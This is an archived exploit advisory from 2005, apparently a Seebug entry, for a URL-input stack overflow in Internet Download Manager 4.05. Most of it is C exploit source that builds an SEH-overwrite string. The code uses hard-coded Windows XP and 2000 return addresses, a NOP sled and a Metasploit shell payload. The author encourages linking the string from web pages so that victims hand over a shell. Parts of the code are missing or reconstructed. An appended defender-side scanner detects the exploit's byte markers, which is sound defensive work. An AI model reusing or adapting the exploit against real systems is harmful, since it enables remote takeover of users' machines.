Internet Download Manager <= 4.05 Input URL Stack Overflow Exploit

ID SSV:14259
Type seebug
Reporter Root
Modified 2005-07-06T00:00:00


No description provided by source.


  Title : Internet Download Manager <= 4.05 universal remote overflow Exploit
  bug analysis and exploit code by : c0d3r "Kaveh Razavi"
  my advisory :
  this bug is different from what was found in the application called altnet
  download manager .
  if you read the code carefully you see that I left thingz for you .
  well if you want to create an html file linked to an evil download offer
  the needed thingz are there , but in IE they are not usable cause the exploit
  string is bigger than the IE input buffer .
  I was analysing this bug and I was thinking about how to code an exploit
  for this issue , then the new Mozilla exploit came up ! yea the idea of saving
  the exploit string into a file then copy/paste it to the download manager
  input url . there are other ways for sure . kiddies still can have fun
  with this code just as I mentioned with a bit of scripting in java or other
  shits you can link the exploit string which will be created in the file exploit.txt
  you can have a bad file , anyone using download manager can give a shell !
  hint! : any other folder is being counted , so my suggestion is linking to the
  root webfolder .
  sample usage shown in a 1 minute movie which can be downloaded at :

  Exploit method : Structured Exception Handling known as SEH .
  Targets : should work on all win2000 and win xp's even sp2 ,
  Tested : winxp sp 1 and win2000 server sp 4
  compile : ms visual c++ 6 : cl dlm.c

  Greetingz : LorD and NT , LorD always makes me happy with those Nasa , berkeley , stanford ,... shells :> yeah me and jamie have just started , u r0x jamie , fewer words better ones , great ! nice work is being done here ! class I used ur offsets :) my home , nth here right now but those nice Essence words .
  other Folks and friends not mentioned here .


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#define exploit "exploit.txt"
#define NOP 0x90
#define size 2519

/* the byte strings of crap1 and crap3 are missing from the page as published */
char crap1[] =
char crap2[] = "\x22\x3E";
char crap3[] =
char crap4[] = "\x31\x31\x2E";

// metasploit shellc0de wow!!! LPORT=4444 Size=399
// (the 399 shellcode bytes are missing from the page as published)
unsigned char shellcode[] =

int main(int argc, char **argv)
{
    FILE *fp;
    char buffer[size];
    unsigned int os;
    char ppr[5];                            /* pop/pop/ret address for the chosen target */
    char jmp[] = "\xEB\x0C\x90\x90";        /* jmp short +0x0c, hops over the handler slot */
    char winxp[] = "\xB1\x2C\xC2\x77";      /* target 0 */
    char win2000[] = "\x08\xB0\x01\x78";    /* target 1 */

    if (argc < 2) {
        printf("\n-------- Download Manager remote exploit\n");
        printf("-------- copyrighted by c0d3r of IHS 2005\n");
        printf("-------- usage : dlm.exe target\n");
        printf("-------- target 1 : windows xp all service packs all languages : 0\n");
        printf("-------- target 2 : windows 2000 all service packs all languages : 1\n");
        printf("-------- eg : dlm.exe 0\n");
        printf("-------- out file will be exploit.txt for windows xp\n\n");
        exit(-1);
    }
    os = (unsigned short)atoi(argv[1]);
    /* the case bodies are missing from the page; restored here from the
       ppr / winxp / win2000 declarations above (an assumption) */
    switch (os) {
    case 0:
        memcpy(ppr, winxp, 4);
        break;
    case 1:
        memcpy(ppr, win2000, 4);
        break;
    default:
        printf("\n[-] this target doesnt exist in the list\n\n");
        exit(-1);
    }
    printf("\n-------- Download Manager remote exploit\n");
    printf("-------- copyrighted by c0d3r of IHS 2005\n");
    // heart of exploit
    printf("-------- building overflow string\n");
    /* the lines that assemble buffer from crap1..crap4, jmp, ppr, the NOP
       sled and shellcode are missing from the page as published; only the
       terminator survives (the original wrote buffer[size], one past the end) */
    buffer[size - 1] = 0;
    // EO heart of exploit
    printf("-------- Done !\n");
    printf("-------- Creating the exploit.txt file\n");
    fp = fopen(exploit, "w+");
    fwrite(buffer, sizeof(unsigned char), sizeof(buffer), fp);
    fclose(fp);
    printf("-------- Done ! enjoy it !\n");
    return 0;
}
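Added example, written from the defender's side and not part of the advisory or of c0d3r's code: a small C scanner that flags a URL string carrying the markers the exploit above relies on for its SEH overwrite. The markers are taken from the source as published (the 2519-byte buffer size, the "\xEB\x0C\x90\x90" short jump placed in the next-SEH slot, the two hard-coded pop/pop/ret addresses for the handler slot, and a 0x90 NOP sled). The 32-byte sled threshold, the example.com URL, and the fixture that plants the jump and handler at offset 2000 are constructed for the example; the fixture offset is arbitrary and is not the real overwrite offset.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SEH_SUSPICIOUS_LEN 2519   /* "size" constant from the exploit source */
#define SEH_NOP_RUN        32     /* assumed threshold: this many 0x90 in a row is a sled */

/* Indicator bits returned by seh_indicators() */
enum {
    IND_LONG = 1,   /* input at least as long as the exploit's buffer */
    IND_JMP  = 2,   /* "jmp short +0x0c" pad used in the next-SEH slot */
    IND_PPR  = 4,   /* one of the pop/pop/ret addresses the exploit hardcodes */
    IND_NOPS = 8    /* long NOP sled */
};

static const unsigned char JMP_SHORT[4] = {0xEB, 0x0C, 0x90, 0x90};
static const unsigned char PPR_XP[4]    = {0xB1, 0x2C, 0xC2, 0x77};  /* target 0 */
static const unsigned char PPR_W2K[4]   = {0x08, 0xB0, 0x01, 0x78};  /* target 1 */

/* Byte-exact substring search (strstr() stops at NULs, these inputs do not). */
static int has_bytes(const unsigned char *buf, size_t n,
                     const unsigned char *pat, size_t m)
{
    size_t i;
    if (n < m) return 0;
    for (i = 0; i + m <= n; i++)
        if (memcmp(buf + i, pat, m) == 0) return 1;
    return 0;
}

/* Length of the longest run of consecutive 0x90 bytes. */
static size_t longest_nop_run(const unsigned char *buf, size_t n)
{
    size_t i, run = 0, best = 0;
    for (i = 0; i < n; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Returns an OR of IND_* bits; 0 means none of the exploit's markers are present. */
int seh_indicators(const unsigned char *buf, size_t n)
{
    int flags = 0;
    if (n >= SEH_SUSPICIOUS_LEN) flags |= IND_LONG;
    if (has_bytes(buf, n, JMP_SHORT, sizeof JMP_SHORT)) flags |= IND_JMP;
    if (has_bytes(buf, n, PPR_XP, sizeof PPR_XP) ||
        has_bytes(buf, n, PPR_W2K, sizeof PPR_W2K)) flags |= IND_PPR;
    if (longest_nop_run(buf, n) >= SEH_NOP_RUN) flags |= IND_NOPS;
    return flags;
}

/* Constructed fixture: a NOP-filled 2519-byte "URL" with the short jump and
   the XP pop/pop/ret address planted at an arbitrary offset (not the real one). */
static size_t build_fixture(unsigned char *out, size_t cap)
{
    if (cap < SEH_SUSPICIOUS_LEN) return 0;
    memset(out, 0x90, SEH_SUSPICIOUS_LEN);
    memcpy(out + 2000, JMP_SHORT, sizeof JMP_SHORT);
    memcpy(out + 2004, PPR_XP, sizeof PPR_XP);
    return SEH_SUSPICIOUS_LEN;
}

/* Runs the scanner over the constructed fixture and returns its indicator bits. */
int scan_fixture(void)
{
    static unsigned char fixture[SEH_SUSPICIOUS_LEN];
    size_t n = build_fixture(fixture, sizeof fixture);
    return seh_indicators(fixture, n);
}

int main(void)
{
    const char *benign = "http://example.com/file.zip";   /* constructed sample */
    printf("benign  : indicators 0x%x\n",
           seh_indicators((const unsigned char *)benign, strlen(benign)));
    printf("fixture : indicators 0x%x\n", scan_fixture());
    return 0;
}
```

The four bits are deliberately independent: a legitimate URL can be long, and a binary blob can contain a 0x90 run, but the hard-coded handler addresses together with the short jump and the sled are what distinguish this input shape from noise, so a filter in front of a download manager's URL field would treat IND_PPR plus any other bit as a hard reject and IND_LONG alone as merely worth logging.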